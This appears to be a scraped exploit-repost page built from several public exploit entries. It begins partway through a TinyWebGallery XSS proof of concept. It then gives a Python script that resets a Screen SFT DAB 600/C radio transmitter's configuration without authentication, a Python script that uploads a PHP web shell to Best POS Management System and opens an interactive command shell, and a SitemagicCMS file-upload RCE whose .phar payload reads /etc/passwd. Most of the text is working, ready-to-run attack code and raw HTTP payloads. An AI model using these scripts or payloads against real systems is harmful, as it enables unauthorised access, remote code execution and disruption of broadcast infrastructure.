twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save 5. Go to http://localhost/twg25/index.php
HireHackking

Screen SFT DAB 600/C - Authentication Bypass Reset Board Config

HACKER · %s · %s

#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5775 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') e='/system/api/deviceManagement.cgx' print('Calling object: ssbtObj') print('CGX fastcall: deviceManagement::reset') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber--', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'deviceManagement', 'ssbtObj':{ 'reset':'true' } } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-1)
HireHackking
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution # Google Dork: NA # Date: 15/5/2023 # Exploit Author: Mesut Cetin # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip # Version: 1.0 # Tested on: Kali Linux import sys import requests import subprocess import time if len(sys.argv) < 2: print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0]) print("Example: %s 192.168.106.130" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/kruxton/ajax.php?action=save_settings" def brute_force_timestamp(timestamp_prev, ip): progress = 0 webshell = None for i in range(20): for j in range(0, 1000, 20): timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php" response = requests.get(url) if response.status_code == 200: webshell = url break progress += 1 print(f"Attempt {progress}/400", end="\r") time.sleep(0.1) if progress >= 400: break if webshell or progress >= 400: break if webshell: print("\033[92m[+] Webshell found:", webshell, "\033[0m") else: print("\033[91m[-] Webshell not found\033[0m") return webshell def get_unix_timestamp(): timestamp = subprocess.check_output(['date', '+%s']).decode().strip() return int(timestamp) def extract_output(response_text): start_tag = "<pre>" end_tag = "</pre>" start_index = response_text.find(start_tag) end_index = response_text.find(end_tag) if start_index != -1 and end_index != -1 and start_index < end_index: output = response_text[start_index + len(start_tag):end_index] return output.strip() return None def code_execution(webshell): if not webshell: print("\033[91mWebshell URI not provided\033[0m") return while True: command = input("Enter command to execute (or 'exit' to quit): ") if command == 'exit': break url = webshell + f"?cmd={command}" response = requests.get(url) output = extract_output(response.text) if output: print("\033[93m[+] Output:\033[0m") print(output) else: print("\033[91m[-] No output received\033[0m") data = '''\ -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="name" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="email" test@gmail.com -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="contact" 9000000000 -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="about" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> -----------------------------49858899034227071432271107689--''' headers = { 'Host': f"{ip}", 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689', 'Content-Length': str(len(data)), 'Connection': 'close' } timestamp_prev = get_unix_timestamp() response = requests.post(url, data=data, headers=headers) if response.status_code == 200 and response.text == '1': print("[+] Timestamp: %s" % timestamp_prev) print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m") webshell = brute_force_timestamp(timestamp_prev, ip) code_execution(webshell) else: print("Did not worked")
HireHackking

SitemagicCMS 4.4.3 - Remote Code Execution (RCE)

HACKER · %s · %s

#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE) #Application: SitemagicCMS #Version: 4.4.3 #Bugs: RCE #Technology: PHP #Vendor URL: https://sitemagic.org/Download.html #Software Link: https://github.com/Jemt/SitemagicCMS #Date of found: 14-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. go to content then files 2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?> 3. go to http://localhost/SitemagicCMS/files/images/shell.phar payload: <?php echo system("cat /etc/passwd"); ?> Poc request : POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1 Host: localhost Content-Length: 492 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf Connection: close ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system('cat /etc/passwd'); ?> ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMPostBackControl" ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMRequestToken" 60a7a113cf94842a197912273825b421 ------WebKitFormBoundarywPUsZSbtgJ6nAn8W--